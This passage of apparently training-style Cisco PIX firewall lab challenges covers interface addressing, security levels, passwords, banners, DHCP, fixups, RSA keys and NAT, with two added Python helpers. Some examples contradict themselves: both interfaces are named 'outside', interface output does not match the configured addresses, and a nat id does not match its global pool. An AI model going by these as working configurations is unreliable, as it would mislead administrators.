0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

Cisco PIX Challenge 2


Outline
This challenge involves the configuration of basic PIX details (E1 and E2).
Objectives
The objectives of this challenge are to:

Define the IP address and subnet mask of E1.


Define the IP address and subnet mask of E2.

Example (Ver 6.x)


> enable
# nameif
# config t
(config)# ip address inf2 192.168.1.1 255.255.255.0
(config)# ip address inside 10.0.1.1 255.255.0.0
(config)# interface e1 auto
(config)# interface e2 auto
(config)# exit
# show ip
# show running
# sh int e1
Interface Ethernet1 inside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

Example (Ver 7.x)


> enable
# sh nameif
# config t
(config)# int e1
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int e2
(config-if)# ip address outside 192.168.2.1 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# exit
# show ip add
# show running
# sh int e1
Interface Ethernet1 inside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

Cisco PIX Challenge 3


Outline
This challenge involves the configuration of basic PIX details (names of interfaces, security
levels, and so on).
Objectives
The objectives of this challenge are to:

Define the name of each of the interfaces.

Example (Ver 6.x)


> enable
# nameif
# config t
(config)# nameif e0 mars security0
(config)# nameif e1 pluto security100
(config)# nameif e2 jupiter security50
(config)# help username
USAGE:
username <username> {nopassword|password <password>
[encrypted]} [privilege <level>]
no username <name>
[no] username <name> attributes
clear configure username [<name>]
show running-config [all] username [<name> [attributes]]
DESCRIPTION:
username

Configure user authentication local database

SYNTAX:
<username>    The name of the user. A minimum of 4 characters is required.
              A maximum of 64 characters is allowed.
<nopassword>  Indicates that this user has no password
<password>    The password for this user
encrypted     Indicate the <password> entered is encrypted
<level>       The privilege level for this user
attributes    Enter the attributes sub-command mode
(config)# username fred password bert
(config)# exit
# show running

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif mars
(config-if)# security-level 0
(config-if)# exit
(config)# int e1
(config-if)# nameif pluto
(config-if)# security-level 100
(config-if)# exit
(config)# int e2
(config-if)# help nameif
USAGE:
nameif <if_name>
no nameif [<if_name>]
show running-config [all] nameif [<interface>]
show nameif [<interface>]
clear nameif
DESCRIPTION:
nameif        Assign name to interface
SYNTAX:
<if_name>     A name by which this interface will be referred in all
              other commands
<interface>:  Interface identifier as used in the 'interface' command.

see also:
security-level, interface, static, global, nat
(config-if)# nameif jupiter
(config-if)# help security-level
USAGE:
security-level <0-100>
no security-level [<0-100>]
DESCRIPTION:
security-level  Specify security level of interface
SYNTAX:
<0-100>  The security level of this interface from 0 to 100.
         The relative security level between two interfaces determines
         the way the Adaptive Security Algorithm is applied.
         A lower security_level interface is outside relative to a higher
         level interface and equivalent interfaces are outside to each
         other.

see also:
nameif
(config-if)# security-level 50
(config-if)# exit
(config)# help username
USAGE:
username <username> {nopassword|password <password>
[encrypted]} [privilege <level>]
no username <name>
[no] username <name> attributes
clear configure username [<name>]
show running-config [all] username [<name> [attributes]]
DESCRIPTION:
username      Configure user authentication local database
SYNTAX:
<username>    The name of the user. A minimum of 4 characters is required.
              A maximum of 64 characters is allowed.
<nopassword>  Indicates that this user has no password
<password>    The password for this user
encrypted     Indicate the <password> entered is encrypted
<level>       The privilege level for this user
attributes    Enter the attributes sub-command mode
(config)# username fred password bert
(config)# exit
# show running
# show running user

Cisco PIX Challenge 4


Outline
This challenge involves the configuration of basic PIX details (HTTP, Passwords, MOTD,
and so on).
Objectives
The objectives of this challenge are to:

Define a hostname and passwords.


Enable the HTTP server.
Define a MOTD banner.

Example (Ver 6.x)


> enable
# nameif
# config t
(config)# hostname mars
(config)# help enable
USAGE:
enable password [<pw>] [level <level>] [encrypted]
no enable password level <level>
show running-config enable
DESCRIPTION:
enable

Configure enable passwords

SYNTAX:
<pw>
The password for this privilege level
<level>
The privilege level
<encrypted>
Indicates that this password is encrypted
(config)# enable ?
configure mode commands/options:
password Configure password for the enable command
(config)# enable password ?
configure mode commands/options:
WORD Enter a password for the privilege level
<cr>
(config)# enable password kirk
(config)# password ?
configure mode commands/options:
WORD A password of up to 16 alphanumeric characters
(config)# passwd kent
(config)# help password
USAGE:
[no] password|passwd <password> encrypted
clear configure passwd
DESCRIPTION:
passwd      Change Telnet console access password
SYNTAX:
<password>  A password of up to 16 alphanumeric characters
            Factory-default password is cisco
encrypted   Indicate the <password> entered is encrypted

see also:
telnet
(config)# help http
USAGE:
[no] http <local_ip> <mask> <if_name>
[no] http server enable
DESCRIPTION:
http        Configure HTTP server
SYNTAX:
<local_ip>  The ip address of the host and/or network authorized to
            access the device HTTP server.
<mask>      The IP netmask to apply to <local_ip>.
            Default is 255.255.255.255.
<if_name>   Network interface name.

see also:
password, aaa
(config)# http server enable
(config)# help banner
USAGE:
banner {exec | login | motd} <text>
no banner {exec | login | motd} [<text>]
show banner [{exec | login | motd}]
clear banner
DESCRIPTION:
banner  Configure login/session banners
SYNTAX:
exec    Configures the system to display a banner before the enable prompt
        is displayed.
login   Configures the system to display a banner before the password login
        prompt when accessing the device using telnet.
motd    Configures the system to display a message-of-the-day banner.
<text>  A line of the message to be displayed. It will be added to the end
        of an existing banner. The tokens $(domain) and $(hostname) will be
        replaced with the host name and domain name.
(config)# banner motd hello
(config)# show banner
# show banner

Example (Ver 7.x)


As Ver 6.x, but use show running banner instead of show banner.

Cisco PIX Challenge 5


Outline
This challenge involves the configuration of a static route, and some banners.
Objectives
The objectives of this challenge are to:

Define a static route.


Define banners.

Example
mypix(config)# help route
USAGE:
[no] route <if_name> <foreign_ip> <mask> <gateway>
[<metric>|tunneled]
clear configure route [<if_name>]
clear route [<if_name>]
show running-config route
show route [<if_name>]
DESCRIPTION:
route         Enter a static route for an interface
SYNTAX:
<if_name>     The interface name, as specified by the 'nameif' command,
              for which the route will apply
<foreign_ip>  The foreign network for this route, 0 means default
<mask>        The netmask for the destined foreign network <foreign_ip>
<gateway>     The address of the gateway by which <foreign_ip> is reached
<metric>      Distance metric for this route, default is 1
tunneled      Specifies route as the default tunnel gateway for VPN traffic.

see also:
rip, ping

pixfirewall(config)# route inside 10.0.0.0 ?
configure mode commands/options:
A.B.C.D The netmask for the destined foreign network
pixfirewall(config)# route inside 10.0.0.0 255.255.0.0 ?
configure mode commands/options:
Hostname or A.B.C.D The address of the gateway by which the foreign network
is reached.
pixfirewall(config)# route inside 10.0.0.0 255.255.0.0 206.59.124.10 ?
configure mode commands/options:
<1-255>
Distance metric for this route, default is 1
tunneled Enable the default tunnel gateway option, metric is set
to 255
myPIX (config)# route outside 10.0.0.0 255.255.0.0 206.59.124.10
myPIX (config)# show route
myPIX (config)# banner motd admin device
myPIX (config)# banner login personal device
myPIX (config)# banner exec main device
myPIX (config)# show domain-name
myPIX (config)# domain-name dumfries.eu

Cisco PIX Challenge 6


Outline
This challenge involves the configuration of Telnet, SSH and Console timeouts.
Objectives
The objectives of this challenge are to:

Setup the hostname.


Define the domain name.
Define the Telnet timeout.
Define the SSH timeout.
Define the Console timeout.

Example

myPIX (config)# hostname arizona
arizona (config)# domain-name fife.nu
arizona (config)# show domain-name
myPIX (config)# help telnet
USAGE:
[no] telnet <local_ip> <mask> <if_name>
telnet timeout <number>
no telnet timeout [<number>]
DESCRIPTION:
telnet      Add telnet access to device console and set idle timeout
SYNTAX:
<local_ip>  The ip address of the host and/or network authorized to
            login to the device
<mask>      The IP netmask to apply to <local_ip>.
<if_name>   Network interface name.
<number>    Idle time in minutes after which a telnet session will be closed.
            Default is 5 minutes.

see also:
ssh, password, aaa
arizona (config)# telnet timeout 8
arizona (config)# help ssh
USAGE:
[no] ssh <local_ip> <mask> <if_name>
[no] ssh timeout <number>
[no] ssh version 1|2
[no] ssh scopy enable
show ssh sessions [<client_ip>]
ssh disconnect <session_id>
DESCRIPTION:
ssh           Add SSH access to the Device console, set idle timeout, set
              version supported, enable Secure Copy as an SSH application,
              display a list of active SSH sessions, and terminate an SSH
              session.
SYNTAX:
<local_ip>    The IP address of the host and/or network authorized to
              login to the Device.
<mask>        The IP netmask to apply to <local_ip>.
<if_name>     Network interface name.
<number>      Idle time in minutes after which a SSH session will be closed.
<client_ip>   The IP address of the SSH client.
<session_id>  Session ID as displayed by the 'show ssh sessions' command.

see also:
telnet, password, enable, aaa
arizona (config)# ssh timeout 9
pixfirewall(config)# help console
USAGE:
[no] console timeout <number>
DESCRIPTION:
console   Set idle timeout for the serial console of the PIX
SYNTAX:
<number>  Valid range <0-60>. For <1..60>, console session will be
          closed after idle time of <1..60> minutes. console
          will never close for timeout <0>

see also:
telnet, ssh, passwd, aaa
arizona (config)# console timeout 9
arizona (config)# show telnet
arizona (config)# show ssh
arizona (config)# show console

Cisco PIX Challenge 7


Outline
This challenge involves the configuration of the security levels on the interfaces.
Objectives
The objectives of this challenge are to:

Rename the interfaces, and define the security level on each interface.

Note: A port with the name of outside always has a security level of 0, while a port with the
name of inside always has a security level of 100.
Example (Ver 6.x)
myPIX (config)# nameif e0 strathclyde security24
myPIX (config)# nameif e1 orkney security61
myPIX (config)# nameif e2 rhodeisland security44

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif strathclyde
(config-if)# security-level 24
(config-if)# exit
(config)# int e1
(config-if)# nameif orkney
(config-if)# security-level 61
(config-if)# exit
(config)# int e2
(config-if)# nameif rhodeisland
(config-if)# security-level 44
(config-if)# exit
(config)# exit
# show running
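Challenges 3 and 7 both assign interface names and security levels, and the `help security-level` output in Challenge 3 explains what the number means: the lower-level interface is "outside" relative to the higher one, and equal levels are outside to each other. The Python below is an added example, not NetworkSims' code. It parses both the 6.x `nameif <if> <name> security<N>` form and the 7.x interface-block form from these challenges into the same `{name: level}` map, enforces the page's note that `outside` is always 0 and `inside` always 100, and then applies the ASA default policy, which is my addition from ASA behaviour rather than something the page states: a new connection from a higher level to a lower level is permitted without an access-list, the reverse is denied until an access-list allows it, and equal levels are denied unless same-security inter-interface traffic has been permitted. The configurations it reads are the ones from Challenge 7, re-typed as sample data.

```python
"""Model of PIX/ASA interface security levels.

Added example, not NetworkSims' code. parse_security_levels() accepts the
6.x one-line form and the 7.x interface-block form; default_flow() applies
the ASA default policy for flows with no access-list (my addition, not
from the page). The configs below are constructed from Challenge 7.
"""
import re

PIX6_CONFIG = """\
nameif e0 strathclyde security24
nameif e1 orkney security61
nameif e2 rhodeisland security44
"""

PIX7_CONFIG = """\
interface e0
 nameif strathclyde
 security-level 24
interface e1
 nameif orkney
 security-level 61
interface e2
 nameif rhodeisland
 security-level 44
"""

# The page's note: 'outside' is always level 0, 'inside' always level 100.
RESERVED = {"outside": 0, "inside": 100}

RE_6X = re.compile(r"nameif\s+\S+\s+(\S+)\s+security(\d+)$")
RE_7X_NAME = re.compile(r"nameif\s+(\S+)$")
RE_7X_LEVEL = re.compile(r"security-level\s+(\d+)$")


def parse_security_levels(config):
    """Return {interface name: security level} from 6.x or 7.x config text."""
    levels = {}
    pending = None                  # 7.x: nameif seen, security-level not yet
    for raw in config.splitlines():
        line = raw.strip()
        m6, m7n, m7l = RE_6X.match(line), RE_7X_NAME.match(line), RE_7X_LEVEL.match(line)
        if m6:
            levels[m6.group(1)] = int(m6.group(2))
        elif m7n:
            pending = m7n.group(1)
        elif m7l and pending:
            levels[pending] = int(m7l.group(1))
            pending = None
    for name, level in levels.items():
        if not 0 <= level <= 100:
            raise ValueError(f"{name}: level {level} is outside 0-100")
        if name in RESERVED and RESERVED[name] != level:
            raise ValueError(f"{name} must be security{RESERVED[name]}")
    return levels


def default_flow(levels, src, dst, same_security_permitted=False):
    """'permit' or 'deny' for a new connection src -> dst with no access-list."""
    s, d = levels[src], levels[dst]
    if s > d:
        return "permit"             # higher level is "inside" relative to dst
    if s == d and same_security_permitted:
        return "permit"
    return "deny"                   # lower -> higher, or equal levels


if __name__ == "__main__":
    levels = parse_security_levels(PIX7_CONFIG)
    for src in levels:
        for dst in levels:
            if src != dst:
                print(f"{src:12} -> {dst:12} {default_flow(levels, src, dst)}")
```

Running it prints the six interface pairs from Challenge 7; `orkney` (61) reaches both other interfaces by default, while nothing reaches `orkney` without an access-list.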

Cisco PIX Challenge 8


Outline
This challenge involves the configuration of a shutdown on the interfaces.
Objectives
The objectives of this challenge are to:

Define the names of the interfaces.


Shutdown each of the interfaces.

Example (6.x)
myPIX (config)# nameif e0 gretna security0
myPIX (config)# nameif e1 alabama security100
myPIX (config)# nameif e2 uranus security50
myPIX (config)# show nameif
myPIX (config)# interface e0 auto shut
myPIX (config)# interface e1 auto shut
myPIX (config)# interface e2 auto shut
myPIX (config)# show int
myPIX (config)# show int e0
myPIX (config)# show int e1
myPIX (config)# show int e2

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif gretna
(config-if)# security-level 0
(config-if)# shutdown
(config-if)# exit
(config)# int e1
(config-if)# nameif alabama
(config-if)# security-level 100
(config-if)# shutdown
(config-if)# exit
(config)# int e2
(config-if)# nameif uranus
(config-if)# security-level 50
(config-if)# shutdown
(config-if)# exit
(config)# exit
# show running

Cisco PIX Challenge 9


Outline
This challenge involves the configuration of interfaces for various settings, such as duplex,
speed, and so on.
Objectives
The objectives of this challenge are to:

Define the names of the interfaces.


Define the basic operation of the interfaces.

Example (Ver 6.x)


myPIX (config)# nameif e0 hawaii security0
myPIX (config)# nameif e1 alberta security100
myPIX (config)# nameif e2 orkney security50
myPIX (config)# interface e0 100full
myPIX (config)# interface e1 100full
myPIX (config)# interface e2 100full

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# help interface
USAGE:
interface <type> <port>
interface <type> <port>.<subif_number>
no interface <type> <port>.<subif_number>
show running-config [default] interface {<type> <port>[.<subif_number>]}
show interface {<type> <port>[.<subif_number>] | <if_name>} [detail|stats|ip brief]
clear config interface {<type> <port>[.<subif_number>]}
clear interface {<type> <port>[.<subif_number>]}
DESCRIPTION:
interface       Set network interface parameters
                show/clear interface counters
                show brief summary of IP status and configuration
SYNTAX:
<type>          Type of interface to be configured
                Possible values: Ethernet, GigabitEthernet
<port>          Port number. Refer to the appropriate hardware manual for
                port information
<subif_number>  Subinterface number in the range 1 to 4,294,967,293
<if_name>       Interface name assigned by 'nameif' command

WARNING! Using 'no' on a Subinterface will remove the interface
from the system. Removing a Subinterface will delete all
configuration rules applied to the interface. Exercise caution when
using the 'no interface' command.
see also:
allocate-interface

(config)# int e0
(config-if)# nameif gretna
(config-if)# security-level 0
(config-if)# help du
USAGE:
duplex auto|full|half
no duplex [auto|full|half]
DESCRIPTION:
duplex  Configure duplex operation
SYNTAX:
auto    Enable AUTO duplex configuration
full    Force full duplex operation
half    Force half-duplex operation

see also:
speed
(config-if)# duplex full
(config-if)# help speed
USAGE:
speed 10|100|1000|auto
no speed [10|100|1000|auto]
DESCRIPTION:
speed  Configure speed operation
SYNTAX:
Possible Ethernet values are:
10     Force 10 Mbps operation
100    Force 100 Mbps operation
auto   Enable AUTO speed configuration
Possible GigabitEthernet values are:
10     Force 10 Mbps operation
100    Force 100 Mbps operation
1000   Force 1000 Mbps operation
auto   Enable AUTO speed configuration
see also:
duplex
(config-if)# speed 100
(config-if)# exit
(config)# int e1
(config-if)# nameif alabama
(config-if)# security-level 100
(config-if)# duplex full
(config-if)# speed 100
(config-if)# exit
(config)# int e2
(config-if)# nameif uranus
(config-if)# security-level 50
(config-if)# duplex full
(config-if)# speed 100
(config-if)# exit
(config)# exit
# show running

Cisco PIX Challenge 10


Outline
This challenge involves the configuration of the DHCP server.
Objectives
The objectives of this challenge are to:

Enable the DHCP server.


Define DHCP parameters.
Show DHCP parameters.

Example
myPIX (config)# help dhcpd
USAGE:
dhcpd address <ip1>[-<ip2>] <srv_ifc_name>
dhcpd dns <dnsip1> [<dnsip2>]
dhcpd wins <winsip1> [<winsip2>]
dhcpd lease <lease_length>
dhcpd ping_timeout <timeout>
dhcpd domain <domain_name>
dhcpd option <code> {ascii <string> | hex <hex_string> |
ip <address_1> [<address_2>]}
dhcpd enable <srv_ifc_name>
dhcpd auto_config <clnt_if_name>
show dhcpd [binding|statistics]
clear dhcpd
clear dhcpd [binding|statistics]
DESCRIPTION:
dhcpd           Configure DHCP Server
SYNTAX:
<ip1>           Start address of the DHCP address pool
<ip2>           End address of the DHCP address pool
<dnsip>         DNS server IP address
<winsip>        NetBios name server IP address
<lease_length>  DHCP lease length in seconds
<timeout>       Ping timeout in milliseconds
<domain_name>   DNS domain name
<code>          positive number representing the DHCP option code
<string>        ASCII string without whitespace
<hex_string>    hexadecimal string without whitespace
<address_1>     IP address
<address_2>     IP address
<srv_ifc_name>  Interface to enable DHCP server
<clnt_if_name>  Interface to retrieve DHCP client info
myPIX (config)# dhcpd enable
myPIX (config)# dhcpd address 197.174.60.2-197.174.60.22 inside
myPIX (config)# dhcpd wins 195.94.110.3
myPIX (config)# dhcpd lease 6
myPIX (config)# dhcpd domain athome.com
myPIX (config)# show dhcpd

Cisco PIX Challenge 11


Outline
This challenge involves the configuration of fixups.
Objectives
The objectives of this challenge are to:

Define fixup protocols.


Show fixup protocols.

Example (V6.x)
myPIX (config)# help fixup
USAGE:
[no] fixup protocol <prot> [<option>] <port>[-<port>]
DESCRIPTION:
fixup

Add or delete inspection service and feature defaults

SYNTAX:
<prot>             Protocol fixup to be enabled or disabled:
                   ctiqbe, dns [maximum-length <length>], ftp [strict], h323,
                   http, icmp [error], ils, mgcp, netbios, pptp, rsh, rtsp, sip,
                   skinny, smtp, snmp, sqlnet, sunrpc, sunrpc_udp, tftp, xdmcp
                   The fixup can be disabled via the no form of the command, e.g.,
                   no fixup protocol ftp strict 21
<option>           option to the inspection function
<port1>[-<port2>]  A range of ports to enable the fixup
myPIX (config)# fixup protocol ?
configure mode commands/options:
ctiqbe
dns
ftp
h323
http
icmp
ils
mgcp
netbios
pptp
rsh
rtsp
sip
skinny
smtp
snmp
sqlnet
sunrpc
sunrpc_udp
tftp
xdmcp
myPIX (config)# fix pro http ?
configure mode commands/options:
WORD
Specify port(s) to enable fixup, <port1>[-<port2>]; default port(s):
ctiqbe--------------2748 ftp-------------------21
gtp------------2123,3386 h323-h225-----------1720
h323-ras-------1718-1719 http------------------80
ils------------------389 mgcp-----------2427,2727
netbios----------137-138 pptp----------------1723
rsh------------------514 rtsp-----------------554
sip-----------------5060 skinny--------------2000
smtp------------------25 snmp-----------------161
sqlnet--------------1521 sunrpc---------------111
sunrpc_udp-----------111 tftp------------------69
xdmcp----------------177
highs  Ports 1024-65535
lows   Ports 1-1023
udp    Enable SIP over UDP application inspection
myPIX (config)# fixup protocol http 161
myPIX (config)# fixup protocol ftp 60
myPIX (config)# fixup protocol smtp 84
myPIX (config)# show fixup

Example (V7.x)
As V6.x but replace show fixup with:
myPIX # sh run fix
INFO: All 'fixup' commands have been converted to 'inspect' commands.
Please use 'show running-config service-policy' in conjunction
with 'show running-config policy-map' to view the new configuration.
myPIX # sh run service-p
service-policy global_policy global
myPIX # sh run policy-m
!
policy-map global_policy
class inspection_default
inspect dns maximum-length 512
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
inspect http
!
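The 7.x output above says that every 6.x `fixup` has been converted to an `inspect` under a policy-map, and the default ports printed by `fixup protocol http ?` show which port each inspection engine normally watches. The Python below is an added example, not Cisco's migration code, that renders a list of 6.x `fixup protocol <prot> <port>` lines in the 7.x class-map/policy-map form: a fixup on the engine's default port lands under `class inspection_default`, any other port gets its own `class-map` with a `match port` line, and `smtp` becomes `esmtp` as the page's 7.x policy-map shows. The class-map naming (`<inspect>_<port>`) and the tcp/udp choice per protocol are my assumptions, not a PIX convention. It also flags the situation in this very challenge where `http` is put on 161, the default SNMP port.

```python
"""Render PIX 6.x 'fixup protocol' lines as 7.x class-map/policy-map text.

Added example, not Cisco's migration code. DEFAULT_PORTS is the
single-port part of the table printed by 'fixup protocol http ?' on the
page; RENAMED follows the page's 7.x policy-map (smtp -> esmtp).
UDP_PROTOCOLS and the class-map naming scheme are my assumptions.
"""
import re

DEFAULT_PORTS = {
    "ctiqbe": 2748, "ftp": 21, "http": 80, "ils": 389, "pptp": 1723,
    "rsh": 514, "rtsp": 554, "sip": 5060, "skinny": 2000, "smtp": 25,
    "snmp": 161, "sqlnet": 1521, "sunrpc": 111, "sunrpc_udp": 111,
    "tftp": 69, "xdmcp": 177,
}
UDP_PROTOCOLS = {"snmp", "sunrpc_udp", "tftp", "xdmcp"}   # assumption
RENAMED = {"smtp": "esmtp"}
FIXUP_RE = re.compile(r"^\s*fixup protocol (\S+)\s+(\d+)\s*$")


def convert_fixups(fixup_lines):
    """Return (asa7_config_text, warnings) for a list of 6.x fixup lines."""
    default_inspects, custom_classes, warnings = [], [], []
    for line in fixup_lines:
        m = FIXUP_RE.match(line)
        if not m:
            warnings.append(f"unrecognised line: {line.strip()}")
            continue
        proto, port = m.group(1), int(m.group(2))
        inspect = RENAMED.get(proto, proto)
        if proto not in DEFAULT_PORTS:
            warnings.append(f"{proto}: no default port known, review by hand")
        if DEFAULT_PORTS.get(proto) == port:
            default_inspects.append(f"  inspect {inspect}")
            continue
        # A non-default port: warn if it is another engine's default port.
        clash = [p for p, d in DEFAULT_PORTS.items() if d == port and p != proto]
        if clash:
            warnings.append(f"{proto} on {port}: port is the default for {', '.join(clash)}")
        transport = "udp" if proto in UDP_PROTOCOLS else "tcp"
        custom_classes.append((f"{inspect}_{port}", transport, port, inspect))
    out = []
    for name, transport, port, _ in custom_classes:
        out += [f"class-map {name}", f" match port {transport} eq {port}"]
    out.append("policy-map global_policy")
    if default_inspects:
        out.append(" class inspection_default")
        out += default_inspects
    for name, _, _, inspect in custom_classes:
        out += [f" class {name}", f"  inspect {inspect}"]
    return "\n".join(out) + "\n", warnings


if __name__ == "__main__":
    # The three fixups configured in this challenge, plus tftp on its default.
    text, warns = convert_fixups([
        "fixup protocol http 161",
        "fixup protocol ftp 60",
        "fixup protocol smtp 84",
        "fixup protocol tftp 69",
    ])
    print(text)
    for w in warns:
        print("WARNING:", w)
```

The generated text is meant for review before it is applied; the warning about `http` on port 161 is the kind of thing the one-line 6.x syntax hides and the 7.x class-map makes visible.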

Cisco PIX Challenge 12


Outline
This challenge involves the configuration of an encryption key.
Objectives
The objectives of this challenge are to:

Define the domain name.


Define a user and a password.
Create an RSA key.
Show the RSA key.

Example
myPIX (config)# domain-name fife.nu
myPIX (config)# username fred password bert
myPIX (config)# help ca
USAGE:
crypto ca trustpoint <name>
no crypto ca trustpoint <name> [noconfirm]
crypto ca authenticate <name> [fingerprint <hex value>] [nointeractive]
crypto ca enroll <name> [noconfirm]
crypto ca import <name> certificate [nointeractive]
crypto ca import <name> pkcs12 <passphrase> [nointeractive]
crypto ca export <name> pkcs12 <passphrase>
crypto ca crl request <name>
crypto ca certificate map <sequence #>
crypto ca certificate chain <name>
clear configure crypto ca trustpoint
clear configure ca certificate map [<sequence #>]
clear crypto ca crls [<name>]
show crypto ca crls [<name>]
show crypto ca certificates [<name>]
show running-config [all] crypto ca
DESCRIPTION:
ca                  Configure the Certification Authority.
SYNTAX:
trustpoint          Define a CA trustpoint
authenticate        Get the CA certificate
enroll              Request a certificate from a CA
import              Import certificate or pkcs-12 data
export              Export a trustpoint configuration with all associated
                    keys and certificates in PKCS12 format
crl                 For manual CRL polling, displaying, and erasing.
certificate map     Define certificate attributes map
certificate chain   Enter certificate chain configuration mode for the
                    indicated trustpoint
noconfirm           Suppress all interactive prompting
nointeractive       Execute the command in non-interactive mode
fingerprint         A key consisting of alphanumeric characters that is
                    used to authenticate the CA's certificate.
<name>              A nickname for the CA server.
<passphrase>        A required password that gives the CA administrator
                    some authentication when a user calls to ask for a
                    certificate to be revoked.
                    It can be up to 80 characters in length.
<sequence #>        Sequence to insert into certificate map entry
see also: key, crypto, ipsec, isakmp, tunnel-group
myPIX (config)# ca generate rsa key 256
myPIX (config)# show ca mypubkey rsa

Cisco PIX Challenge 13

Outline
This challenge involves the configuration of NAT.
Objectives
The objectives of this challenge are to:

Define inside address range.
Define outside address range.
Show NAT parameters.
Show Global parameters.

Example (Ver 6.x)
myPIX (config)# help nat
USAGE:
[no] nat (<if_name>) <nat_id> <local_ip> [<mask>]
[dns] [outside]
[[tcp] <max_conns> [<emb_limit> [<norandomseq>]]]
[udp <udp_max_conns>]
[no] nat (if_name) <nat_id> access-list <acl-name>
[dns] [outside]
[[tcp] <max_conns> [<emb_limit> [<norandomseq>]]]
[udp <udp_max_conns>]
DESCRIPTION:
nat         Associate a network with a pool of global IP addresses
SYNTAX:
<if_name>   The name of the network interface, as specified by 'nameif',
            where the hosts/network designated by <local_ip> are accessed.
<nat_id>    The id of this group of hosts or networks. This id will
            be referenced by the 'global' command to associate a global
            pool with this command. The id '0' is reserved to indicate
            (i) no address translation with the access-list option or
            (ii) identity translation for the <real_ip> option. The
            maximum nat_id with access-list is 65535. The maximum
            nat_id without access-list is 2147483647.
<local_ip>  The hosts/networks in this <nat_id> group.
            '0' indicates all networks or the default <nat_id> group
            An IP address not found in a more explicit <nat_id> group
            will default to a less explicit or '0', the least explicit
<mask>      The IP netmask to apply to <local_ip>.
dns         Use the created xlate to rewrite DNS address record.
tcp         TCP connections.
udp         UDP connections.
<max_conns> The maximum number of simultaneous connections
            the <local_ip> hosts will each be allowed to use.
            Idle connections are closed after the time specified by the
            timeout conn command.
<emb_limit> The maximum number of embryonic connections per host.
            An embryonic connection is a connection request that has not
            finished the necessary handshake between source and destination.
norandomseq Disable TCP sequence number randomization.
<acl-name>  access-list name.
see also:   access-list, apply, global

myPIX (config)# nat ?
configure mode commands/options:
( Open parenthesis for the name of the network interface where
the hosts/network designated by the local IP address are accessed
myPIX (config)# nat (inside) ?
configure mode commands/options:
<0-2147483647> The <nat_id> of this group of hosts/networks. This <nat_id>
will be referenced by the global command to associate a
global pool with the local IP address. <nat_id> '0' is used
to indicate no address translation for local IP. The limit
is 65535 with access-lists
myPIX (config)# nat (inside) 1 ?
configure mode commands/options:
Hostname or A.B.C.D The hosts/networks in this <nat_id> group, '0' indicates
all networks or the default <nat_id> group
access-list
Specify access-list name after this keyword
myPIX (config)# nat (inside) 1 143.163.128.0 ?
configure mode commands/options:
A.B.C.D IP netmask to apply to the local IP address
<cr>
myPIX (config)# nat (inside) 1 143.163.128.0 255.255.192.0
myPIX (config)# help global
USAGE:
[no] global (<ext_if_name>) <nat_id> {<global_ip>[-<global_ip>] [netmask
<global_mask>]} | interface
DESCRIPTION:
global          Specify, delete or view global address pools,
                or designate a PAT(Port Address Translated) address
SYNTAX:
<(ext_if_name)> The external network interface name
<nat_id>        The id of the nat group(from the nat command) that
                will draw from these global addresses
<global_ip>     The IP address, network or range of addresses that will
                dynamically be translated on an as needed basis to hosts
                in the nat group <nat_id>.
                If this <ext_if_name> is connected to the Internet, the
                <global_ip> should be registered with the Network Information
                Center(NIC).
                These addresses should also be reverse resolvable(in-addr.arpa)
                on the outside DNS servers.
                An address specified singly will be used as a PAT address.
                When all of the non-PAT addresses of a global pool are in use
                and there is a PAT address, subsequent hosts from the nat
                group <nat_id> will share the single PAT address for up to
                the number of licensed connections.
[netmask <global_mask>] The netmask of the global_ip.
interface       IP address of <ext_if_name> overloaded for PAT.
see also:       nat, alias, static

myPIX (config)# global ?
configure mode commands/options:
( Open parenthesis for the external network interface name
myPIX (config)# global (outside) 3 ?
configure mode commands/options:
WORD
Enter IP address or a range of IP addresses <start_ip>[-<end_ip>]
interface Specifies PAT using the IP address at the interface
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 ?
configure mode commands/options:
netmask Specify netmask for the IP address(es) after this keyword
<cr>
myPIX (config)# global (outside) 3 1.2.3.4 net ?
configure mode commands/options:
A.B.C.D Netmask for the IP address(es)
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 netmask 255.255.255.0
myPIX (config)# show nat
myPIX (config)# show global

Example (Ver 7.x)
As Ver 6.x, but replace show nat and show global with:
myPIX (config)# show running nat
myPIX (config)# show running global
